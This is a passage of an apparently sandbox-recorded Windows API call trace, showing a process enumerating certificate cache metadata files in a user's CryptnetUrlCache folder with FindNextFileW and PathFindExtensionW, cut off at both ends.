ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0061.243] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0061.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0061.244] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0061.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0061.245] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0061.246] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0061.246] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0061.247] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0061.247] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) 